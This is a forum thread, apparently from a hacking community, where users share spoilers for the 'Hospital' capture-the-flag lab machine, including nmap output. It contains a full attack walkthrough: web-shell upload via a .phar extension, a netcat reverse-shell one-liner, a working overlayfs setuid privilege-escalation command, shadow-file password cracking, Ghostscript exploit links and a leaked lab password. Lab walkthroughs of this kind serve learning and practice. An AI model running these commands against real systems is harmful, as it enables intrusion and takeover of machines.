I just rooted this box thanks to you guys. But what I'm still trying to figure out is why port 8080 shows up on the nmap scan of the 192.168.5.1 host even though the web application is running on the 192.168.5.2 host. Can anyone explain?
(Nov 19, 2023, 12:42 PM)take1312 Wrote: (Nov 19, 2023, 12:14 PM)nenandjabhata Wrote: (Nov 19, 2023, 11:21 AM)hcker01 Wrote: (Nov 19, 2023, 07:49 AM)m1lk Wrote: (Nov 19, 2023, 06:23 AM)hcker01 Wrote: you can write in a special folder and you gain admin
which folder? xampp/htdocs
Can you detail for administrator please
Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there
access it
receive root shell
When I upload a php shell half of the php gets turned into regular text and I don't understand how to fix this. Could someone help?
(Nov 19, 2023, 06:27 PM)0penEye Wrote: (Nov 19, 2023, 12:42 PM)take1312 Wrote: (Nov 19, 2023, 12:14 PM)nenandjabhata Wrote: (Nov 19, 2023, 11:21 AM)hcker01 Wrote: (Nov 19, 2023, 07:49 AM)m1lk Wrote: which folder? xampp/htdocs
Can you detail for administrator please
Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there
access it
receive root shell
When I upload a php shell half of the php gets turned into regular text and I don't understand how to fix this. Could someone help?
Read the post maybe? The working shell is in here already, as well as the file format.
wait for scripts to run then you can see the administrator's password. I recommend RDP to the target machine.
(Nov 19, 2023, 07:33 PM)take1312 Wrote: (Nov 19, 2023, 06:27 PM)0penEye Wrote: (Nov 19, 2023, 12:42 PM)take1312 Wrote: (Nov 19, 2023, 12:14 PM)nenandjabhata Wrote: (Nov 19, 2023, 11:21 AM)hcker01 Wrote: xampp/htdocs
Can you detail for administrator please
Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there
access it
receive root shell
When I upload a php shell half of the php gets turned into regular text and I don't understand how to fix this. Could someone help? Read the post maybe? The working shell is in here already, as well as the file format.
No, the working shell is not visible to me in /xampp/htdocs.
(Nov 18, 2023, 07:06 PM)take1312 Wrote: nmap slow as fuck
login page for mailer at https
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
| ssh-hostkey:
| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_ 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-19 02:04:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS C, DNS C.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS C, DNS C.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS C, DNS C.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS C, DNS C.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HOSPITAL
| NetBIOS_Domain_Name: HOSPITAL
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hospital.htb
| DNS_Computer_Name: DC.hospital.htb
| DNS_Tree_Name: hospital.htb
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-19T02:05:04+00:00
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after: 2024-03-06T18:39:34
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6404/tcp open msrpc Microsoft Windows RPC
6406/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6407/tcp open msrpc Microsoft Windows RPC
6409/tcp open msrpc Microsoft Windows RPC
6614/tcp open msrpc Microsoft Windows RPC
6625/tcp open msrpc Microsoft Windows RPC
6638/tcp open msrpc Microsoft Windows RPC
8080/tcp open tcpwrapped
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.55 (Ubuntu)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-19T02:05:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.61 seconds
once you create an account
http://hospital.htb:8080/login.php
register.php
you can upload files here
.php did not work but .ps1 does
access files via /uploads/filename
What file did you upload? I tried p0wny-shell, uploaded it, but it did not work.
Nov 21, 2023, 12:52 PM
(This post was last modified: Nov 21, 2023, 12:55 PM by hacker705.)
Can anybody tell me which Windows service is running Ubuntu and the web application on port 8080?
(I already have the administrator flag - I just want to learn.)
For some reason, netstat doesn't list port 8080. Also, I couldn't find WSL or Docker (no wsl or docker commands available) or any other relevant process/service. I stopped the apache service, but that only stopped the web application on port 443.
Nov 21, 2023, 03:42 PM
(This post was last modified: Nov 21, 2023, 03:45 PM by Mia2024.)
(Nov 18, 2023, 11:36 PM)Miranda0315 Wrote: (Nov 18, 2023, 11:33 PM)Atomic2 Wrote: (Nov 18, 2023, 11:14 PM)theart42 Wrote: (Nov 18, 2023, 10:29 PM)take1312 Wrote: password is
qwe123!@#
gl folks, I'm out, machine reverting every 10 mins. Damn apes
and now we phish
Tried generating rev shell with ghostscript multiple times but it never hits
Use this shell: https://github.com/flozz/p0wny-shell/blo.../shell.php
change the file extension to .phar, then upload it to the website, and visit /uploads/shell.phar
thanks bro
(Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay, here is a short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
access via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and crack drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft a malicious .eps file
send this as answer to the mail
-> you get a user shell on hospital
get user flag
root you can find out yourself easily
gave some insights
Nov 21, 2023, 06:28 PM
(This post was last modified: Nov 21, 2023, 06:32 PM by jahman.)
Hello everyone,
Just other ways to root the box:
- On the Ubuntu Hyper-V VM, you can also privesc to root with CVE-2023-35001.
- On the windows machine, you can find the drbrown pass in the "C:/users/drbrown.HOSPITAL/Documents/ghostscript.bat".
- With the winPEAS exe version, it shows a scheduled task that runs: (HOSPITAL\Administrator) OneDriveUpdate: powershell.exe -c "python.exe C:\Windows\System32\SyncAppvPublicationServer.vbs". The vbs/python script is readable and contains the admin password.
(Nov 21, 2023, 12:52 PM)hacker705 Wrote: Can anybody tell me which Windows service is running Ubuntu and the web application on port 8080?
(I already have the administrator flag - I just want to learn.)
For some reason, netstat doesn't list port 8080. Also, I couldn't find WSL or Docker (no wsl or docker commands available) or any other relevant process/service. I stopped the apache service, but that only stopped the web application on port 443.
To answer my own question, Hyper-V Manager is available via RDP and there is the Ubuntu VM.